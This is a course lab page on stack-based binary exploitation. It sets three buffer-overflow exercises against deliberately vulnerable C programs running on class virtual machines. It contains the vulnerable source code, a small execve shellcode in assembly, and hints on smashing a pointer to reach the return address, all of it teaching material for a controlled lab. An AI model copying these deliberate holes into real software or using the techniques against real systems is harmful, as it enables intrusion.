SI485H: Stack Based Binary Exploits (SP17)


Home Policy Calendar Units Assignments Resources

Lab 07: Smash, Smash, Smash … booo army!!!!!

Part 1: Don't Smash the Cafe, Babe! (2 points)

Description

  • Use the shell code to exploit the vulnerable program.

Preamble

  • The assignment can be analyzed on your local VM but must be exploited on the course VM to retrieve the secret message.
  • It must be completed on the clone-1 VM for the course, accessible here:

    ssh -p 2201 saddleback.academy.usna.edu
    

Instructions

  • Your task is to retrieve he secret message by exploiting the program below using the shell code provided.
  • The vulnerable program can be found at this path on the clone-1 VM

    ~aviv/labs/7.1/vulnerable
    
  • The source code for vulnerable is below:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    void foo(char *s){
    
      int i = 0xcafebabe;
      char buf[0xbf];
    
      strcpy(buf,s);
    
      if(i != 0xcafebabe){
        printf("Danger! I'm out-of-here!\n");
        exit(1);
      }
    
    }
    
    int main(int argc, char * argv[]){
      if ( argc < 2){
        printf("I pitty the fool who doesn't give me at least one argument!\n");
        exit(2);
      }
      foo(argv[1]);
    
      printf("Go Army!\n");
      exit(0);
    }
    
  • The provided shell code will call a function called secret that will display the secret message.

    SECTION .text
            global _start
    
    _start:
            jmp callback
    dowork:
            pop esi
            xor ecx,ecx
            mul ecx
            mov al,0xb
            mov ebx, esi
            int 0x80 
    callback:
            call dowork
            db "/home/aviv/las/7.1/secret",0x0
    
    • The permissions on secret are such that only by exploiting the vulnerbale program may you run secret and reveal the secret message.
    • You MAY NOT change the shell code in anyway, but you will need to compile and hexify it

Submission

  • You must submit secret.txt that conatins the secret message
  • The best way to store this is as follows:

    ~aviv/labs/7.1/vulnerable [EXPLOIT STRING] > secret.txt
    

Hints

  • None. You got this one.

Part 2: Smashable Pointers are Dangerous! (4 points + 1) (REQUIRED!)

Description

  • Launch a shell by exploiting the vulnerbale program. This will give you access to an rsa privat key, enabling you to ssh into another VM where a secret message is stored. Retrieve the secret message
  • This lab is required! Bonus point upon completion, i.e., get 5/4 points for doing it.

Preamble

  • The assignment must be completed on the clone-1 VM, accessible via

    ssh -p 2201 saddleback.academy.usna.edu
    

Instructions

  • Your tasks is to exploit the following program below such that you can launch a shell on the clone-1 VM , ssh into clone-2 given access to a private-key file, and read the secret file on the clone-2 VM.
  • The vulernable program can be found here on the clone-1 VM

    ~aviv/labs/7.2/vulnerable
    
  • There is a rsa public/private key pair found here that you will have permission to access once you launch a shell. They are found here.

    ~aviv/labs/7.2/vulnerbale/lab7-2_id_rsa
    
  • Using that public key, you can then ssh into clone-2 VM like so:

    ssh -p 2202 -i lab7-2_id_rsa lab7-2@saddleback.academy.usna.edu
    
  • On the clone-2 VM, as the lab7-2 user, you'll find the secret message at this path:

    ~lab-7.2/secret.txt
    
  • The exploitable program, vulnerable, has the following source code:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    void foo(char *s){
    
      char * p;
      char buf[300];
    
      for(p=buf; *s; p++,s++){
        *p = *s;
      }
    
      return;
    }
    
    int main(int argc, char * argv[]){
      if ( argc < 2){
        printf("I pitty the fool who doesn't give me at least one argument!\n");
        exit(2);
      }
    
      foo(argv[1]);
    
      printf("Go Army!\n");
      exit(0);
    }
    

Submission

  • You must submit a secret.txt containing the secret message

Hints

  • Consider what happens when you smash the pointer p: Once you overwrite that value, you can get it to write almost anywhere … such as the return address
  • But don't overwrite the address of your exploit string!
  • You'll need to use a different shell code than the jmp-callback one
  • ssh likes it's keys to only have user read permission

Part 3: Smashing Standard Input (3 points)

Description

  • Exploit the program to reveal the secret message.

Preamble

  • The assignment must be completed on the clone-1 VM accessible here:

    ssh -p 2201 saddleback.academy.usna.edu
    
  • gitlab repository

    http://saddleback.academy.usna.edu/aviv/lab-7.3
    

Instructions

  • On the Clone-1 VM, you will find a vulnerbale program call vulnerable at the following path:

    ~aviv/labs/7.3/vulnerable
    
  • The secet file can be found here:

    ~aviv/labs/7.3/secret.txt
    
  • The source code for the vulnerable program is below:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    void foo(){
    
      char buf[0x10];
    
      printf("%s", "Say something spirtiful!\n");
    
      scanf("%s",buf);
    
    }
    
    int main(int argc, char * argv[]){
      foo();
      printf("Go Army!\n");
      exit(0);
    }
    
  • Develop an exploit to reveal the secret message.

Submission

  • You must submit three files:
    • secret.txt : the secret message
    • shell.asm : asm formatted version of your shell code that you used
    • description.txt : text file describing how you acomplished this task

Hints

  • You might find that scanf() doesn't properly read your shell code because of format reading, so come up with some creative ways to handle that.